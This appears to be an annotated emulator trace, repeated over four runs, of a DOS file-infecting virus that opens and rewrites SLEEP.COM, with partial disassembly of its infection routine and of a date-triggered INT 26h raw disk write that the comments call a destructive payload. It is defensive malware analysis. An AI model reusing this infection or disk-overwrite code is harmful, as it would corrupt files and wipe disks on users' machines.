{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly from the return address of the DOS "Get date" call (INT 21h AH=2Ah,
; DL = day of month). The raw disk-write path at 0x12a61 runs only when DL == 2.
; The run-configuration records on this page use Day 1, so this trace takes the
; jmp to the ret and never exercises that path.
2018-12-25T12:39:37.132208658Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a61  ; yes -> disk-write path
0x12a5f: jmp 0x12a7e  ; no -> plain return
0x12a61: cli  ; mask interrupts
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): in 16-bit code this one-byte opcode acts as cwd (DX = sign of AX, 0 here since AH = 2); "cdq" is presumably a disassembler quirk
0x12a65: mov cx, 0x100  ; CX = 0x100, the sector count for the interrupt below
0x12a68: int 0x26  ; DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer); AL is not loaded in the visible lines
0x12a6a: jmp 0x12a6c  ; hop to the next instruction
0x12a6c: cli
0x12a6d: mov al, 3  ; register setup ahead of the call below
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61  ; NOTE(review): with 16-bit offset wrap-around this target would be 0x12a61, the disk-write path above — confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; bytes after the ret: load from DS:SI ...
0x12a80: xor al, ah  ; ... XOR with the byte in AH ...
0x12a82: stosb byte ptr es:[di], al  ; ... store to ES:DI; the listing ends here, so the loop bounds are not visible
2018-12-25T12:39:37.134884248Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:37.13865276Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:37.143021912Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:37.144201947Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:37.151866067Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.159335516Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Disassembly from the return address of the DOS "Get time" call (INT 21h AH=2Ch,
; DH = seconds, DL = hundredths). Stores a clock-derived byte, clears the file's
; attributes, closes the handle and reopens the file read/write. Attribute reset
; followed by a read/write reopen is the sequence a behavioural monitor can key on.
; The listing stops after AH = 40h is loaded, before the INT 21h that writes.
2018-12-25T12:39:37.166341159Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; DL = hundredths + seconds (8-bit sum)
0x12c8a: je 0x12c84  ; sum is zero -> branch back, presumably to read the clock again
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106 (looks like a base/delta offset — confirm)
0x12c93: mov byte ptr [si], dl  ; store the clock-derived byte; presumably a key, its consumer is not in this listing
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 -> clears read-only/hidden/system
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = SI + 0xC7, the path argument
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02  ; AH=3Dh open, AL=2: read/write access
0x12ca9: int 0x21
0x12cab: jb 0x12c5e  ; CF set = open failed -> leave this path
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; save the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to handle; the int 0x21 itself is past the end of the listing
2018-12-25T12:39:37.169684453Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:37.193554832Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:37.197937023Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.206030476Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:37.210745792Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.212770542Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.216193195Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:37.218679991Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.221497658Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:37.230878295Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.234231089Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:37.235807598Z 62 PC: 12d0b | Close file
2018-12-25T12:39:37.244260478Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:37.260147071Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:37.263182782Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.270176165Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.277806294Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.280244764Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.290994505Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.293439852Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:37.300610217Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.303566364Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.307159573Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.310659283Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.313180068Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.316537083Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.326794538Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.329303681Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.330996912Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.339951491Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.35083188Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:37.353896581Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.36225698Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.369646227Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.372112495Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.384359201Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.386357901Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:37.394389774Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.398014814Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.399870191Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.401638721Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.402821276Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.404765359Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.410478512Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.412057135Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.413312904Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.418522757Z 67 PC: 12d1c | Get or set file attributes (See above)
; Disassembly from the return address of a second "Get date" call (INT 21h AH=2Ah,
; DH = month, DL = day). DX == 0x0606 (6 June) selects the branch to 0x12d21; any
; other date continues at 0x12d8c. The run-configuration records on this page use
; 1 January, so only the 0x12d8c side is exercised by this trace.
; Everything after the two unconditional jumps is a linear-sweep decode, not traced code.
2018-12-25T12:39:37.429259833Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; month:day == 06:06 ?
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c  ; any other date
0x12b75: jmp 0x12d21  ; 6 June: date-gated branch, body not shown here
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 follow an unconditional jmp and decode implausibly — likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; if these bytes are 00 55 8B EC, decoding from 0x12b81 gives push bp / mov bp, sp, matching the [bp - 0x2c] use below — confirm against the raw bytes
0x12b83: in al, dx
0x12b84: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = 0x1b5 + word at DS:0x106 (search pattern); the int 0x21 is past the end of the listing
2018-12-25T12:39:37.4319161Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:37.436208517Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly from the return address of the DOS "Get date" call (INT 21h AH=2Ah,
; DL = day of month). The raw disk-write path at 0x12a61 runs only when DL == 2.
; The run-configuration records on this page use Day 1, so this trace takes the
; jmp to the ret and never exercises that path.
2018-12-25T12:39:37.460341106Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a61  ; yes -> disk-write path
0x12a5f: jmp 0x12a7e  ; no -> plain return
0x12a61: cli  ; mask interrupts
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): in 16-bit code this one-byte opcode acts as cwd (DX = sign of AX, 0 here since AH = 2); "cdq" is presumably a disassembler quirk
0x12a65: mov cx, 0x100  ; CX = 0x100, the sector count for the interrupt below
0x12a68: int 0x26  ; DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer); AL is not loaded in the visible lines
0x12a6a: jmp 0x12a6c  ; hop to the next instruction
0x12a6c: cli
0x12a6d: mov al, 3  ; register setup ahead of the call below
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61  ; NOTE(review): with 16-bit offset wrap-around this target would be 0x12a61, the disk-write path above — confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; bytes after the ret: load from DS:SI ...
0x12a80: xor al, ah  ; ... XOR with the byte in AH ...
0x12a82: stosb byte ptr es:[di], al  ; ... store to ES:DI; the listing ends here, so the loop bounds are not visible
2018-12-25T12:39:37.463615127Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:37.466455561Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:37.470376388Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:37.471999798Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:37.484013938Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.491217099Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Disassembly from the return address of the DOS "Get time" call (INT 21h AH=2Ch,
; DH = seconds, DL = hundredths). Stores a clock-derived byte, clears the file's
; attributes, closes the handle and reopens the file read/write. Attribute reset
; followed by a read/write reopen is the sequence a behavioural monitor can key on.
; The listing stops after AH = 40h is loaded, before the INT 21h that writes.
2018-12-25T12:39:37.498464182Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; DL = hundredths + seconds (8-bit sum)
0x12c8a: je 0x12c84  ; sum is zero -> branch back, presumably to read the clock again
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106 (looks like a base/delta offset — confirm)
0x12c93: mov byte ptr [si], dl  ; store the clock-derived byte; presumably a key, its consumer is not in this listing
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 -> clears read-only/hidden/system
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = SI + 0xC7, the path argument
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02  ; AH=3Dh open, AL=2: read/write access
0x12ca9: int 0x21
0x12cab: jb 0x12c5e  ; CF set = open failed -> leave this path
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; save the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to handle; the int 0x21 itself is past the end of the listing
2018-12-25T12:39:37.500687002Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:37.517919054Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:37.520297207Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.527135889Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:37.530037861Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.532997674Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.536043539Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:37.537629732Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.539919513Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:37.550146158Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.552471781Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:37.554113458Z 62 PC: 12d0b | Close file
2018-12-25T12:39:37.562738609Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:37.572337428Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:37.574835862Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.582432648Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.592814671Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.595270169Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.608159468Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.609937913Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:37.616573458Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.620075943Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.62293628Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.625493927Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.62714145Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.63093386Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.640040986Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.642676895Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.645211907Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.653078903Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.663094201Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:37.666547973Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.673108991Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.679574222Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.682424057Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.691990091Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.693463314Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:37.70118223Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.703807417Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.706257304Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.709404011Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.710724638Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.712726419Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.721263289Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.724117195Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.725586716Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.733104927Z 67 PC: 12d1c | Get or set file attributes (See above)
; Disassembly from the return address of a second "Get date" call (INT 21h AH=2Ah,
; DH = month, DL = day). DX == 0x0606 (6 June) selects the branch to 0x12d21; any
; other date continues at 0x12d8c. The run-configuration records on this page use
; 1 January, so only the 0x12d8c side is exercised by this trace.
; Everything after the two unconditional jumps is a linear-sweep decode, not traced code.
2018-12-25T12:39:37.743748878Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; month:day == 06:06 ?
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c  ; any other date
0x12b75: jmp 0x12d21  ; 6 June: date-gated branch, body not shown here
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 follow an unconditional jmp and decode implausibly — likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; if these bytes are 00 55 8B EC, decoding from 0x12b81 gives push bp / mov bp, sp, matching the [bp - 0x2c] use below — confirm against the raw bytes
0x12b83: in al, dx
0x12b84: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = 0x1b5 + word at DS:0x106 (search pattern); the int 0x21 is past the end of the listing
2018-12-25T12:39:37.746059077Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:37.750134911Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly from the return address of the DOS "Get date" call (INT 21h AH=2Ah,
; DL = day of month). The raw disk-write path at 0x12a61 runs only when DL == 2.
; The run-configuration records on this page use Day 1, so this trace takes the
; jmp to the ret and never exercises that path.
2018-12-25T12:39:37.536086068Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a61  ; yes -> disk-write path
0x12a5f: jmp 0x12a7e  ; no -> plain return
0x12a61: cli  ; mask interrupts
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): in 16-bit code this one-byte opcode acts as cwd (DX = sign of AX, 0 here since AH = 2); "cdq" is presumably a disassembler quirk
0x12a65: mov cx, 0x100  ; CX = 0x100, the sector count for the interrupt below
0x12a68: int 0x26  ; DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer); AL is not loaded in the visible lines
0x12a6a: jmp 0x12a6c  ; hop to the next instruction
0x12a6c: cli
0x12a6d: mov al, 3  ; register setup ahead of the call below
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61  ; NOTE(review): with 16-bit offset wrap-around this target would be 0x12a61, the disk-write path above — confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; bytes after the ret: load from DS:SI ...
0x12a80: xor al, ah  ; ... XOR with the byte in AH ...
0x12a82: stosb byte ptr es:[di], al  ; ... store to ES:DI; the listing ends here, so the loop bounds are not visible
2018-12-25T12:39:37.5387085Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:37.542107044Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:37.546516799Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:37.547649234Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:37.568521312Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.575552518Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Disassembly from the return address of the DOS "Get time" call (INT 21h AH=2Ch,
; DH = seconds, DL = hundredths). Stores a clock-derived byte, clears the file's
; attributes, closes the handle and reopens the file read/write. Attribute reset
; followed by a read/write reopen is the sequence a behavioural monitor can key on.
; The listing stops after AH = 40h is loaded, before the INT 21h that writes.
2018-12-25T12:39:37.582513494Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; DL = hundredths + seconds (8-bit sum)
0x12c8a: je 0x12c84  ; sum is zero -> branch back, presumably to read the clock again
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106 (looks like a base/delta offset — confirm)
0x12c93: mov byte ptr [si], dl  ; store the clock-derived byte; presumably a key, its consumer is not in this listing
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 -> clears read-only/hidden/system
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = SI + 0xC7, the path argument
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02  ; AH=3Dh open, AL=2: read/write access
0x12ca9: int 0x21
0x12cab: jb 0x12c5e  ; CF set = open failed -> leave this path
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; save the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to handle; the int 0x21 itself is past the end of the listing
2018-12-25T12:39:37.585388033Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:37.602666575Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:37.603967978Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.60907514Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:37.61370152Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.616395528Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.619448011Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:37.620965657Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.623460277Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:37.633227473Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.638338489Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:37.639741853Z 62 PC: 12d0b | Close file
2018-12-25T12:39:37.648590966Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:37.660741265Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:37.66355628Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.67098288Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.680088764Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.68257069Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.693984723Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.696402825Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:37.703948044Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.707094107Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.710672122Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.713682563Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.715815526Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.71942439Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.729718425Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.732168615Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.734244159Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.743490908Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.754682134Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:37.758737376Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.763547608Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.770624901Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.772791471Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.783927562Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.785765763Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:37.792926209Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.796274225Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.798975278Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.802547903Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.807863747Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.810307868Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.819704472Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.823088646Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.825257835Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.83404631Z 67 PC: 12d1c | Get or set file attributes (See above)
; Annotated emulator trace: a 20-instruction linear disassembly that starts at
; the return address of INT 21h "Get date" (Syscall Op 42 is AH = 0x2A printed
; in decimal). Get date returns DH = month and DL = day, so `cmp dx, 0x606`
; tests for month 6, day 6. The next logged calls in this run are at
; 12d97/12d9e, which is consistent with the non-matching branch (0x12d8c)
; having been taken; the code at 0x12d21 reached on a match is not shown.
2018-12-25T12:39:37.845588181Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606
0x12b70: je 0x12b75                         ; date matched -> trampoline at 0x12b75
0x12b72: jmp 0x12d8c                        ; no match
0x12b75: jmp 0x12d21                        ; match path; target is outside this excerpt
; NOTE(review): 0x12b78-0x12b83 follow two unconditional jumps and look like
; data decoded as code by the linear sweep. The last two decodes (00 55 8B,
; then EC) contain 55 8B EC = `push bp; mov bp, sp`, so a routine probably
; begins at 0x12b81 -- confirm against the raw bytes.
0x12b78: and ah, bh
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl
0x12b83: in al, dx
0x12b84: sub sp, 0x2c                       ; reserve 0x2c bytes of stack locals
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a                       ; INT 21h AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]       ; DTA = the local buffer at bp - 0x2c
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e                       ; INT 21h AH=4Eh: find first file
0x12b93: mov cx, 0x10                       ; attribute mask 0x10 (directory bit)
0x12b96: mov dx, 0x1b5                      ; search pattern at 0x1b5 ...
0x12b99: add dx, word ptr [0x106]           ; ... plus the word at [0x106] (presumably a load/delta offset); excerpt ends before the int 0x21
2018-12-25T12:39:37.847950606Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:37.852344895Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Annotated emulator trace: linear disassembly that starts at the return
; address of INT 21h "Get date" (Syscall Op 42 is AH = 0x2A printed in
; decimal). DL holds the day of the month, so `cmp dl, 2` is a date trigger:
; on any other day the routine goes straight to the ret at 0x12a7e. The
; triggered path reaches INT 26h, the DOS absolute disk write service, i.e. a
; destructive payload. A raw-sector write from a program that otherwise only
; does file I/O is a strong behavioural indicator for detection.
2018-12-25T12:39:38.710808466Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a61                         ; day == 2 -> payload path
0x12a5f: jmp 0x12a7e                        ; otherwise return
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq                                ; NOTE(review): one byte long per the addresses; in 16-bit code opcode 99h is CWD (DX = sign-extension of AX), so the mnemonic looks like a disassembler-mode artefact
0x12a65: mov cx, 0x100                      ; CX = sector count for INT 26h (0x100 = 256)
0x12a68: int 0x26                           ; DOS absolute disk write: AL = drive, DX = first sector, DS:BX = buffer
0x12a6a: jmp 0x12a6c
0x12a6c: cli
